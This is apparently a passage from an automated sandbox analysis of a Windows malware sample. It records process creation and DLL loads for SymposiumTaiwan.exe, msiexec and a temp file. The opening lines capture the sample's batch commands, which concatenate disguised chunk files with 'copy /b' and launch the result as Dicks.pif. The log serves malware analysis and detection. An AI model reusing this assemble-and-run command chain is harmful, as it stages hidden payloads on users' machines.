              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\kJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\kJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pifJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
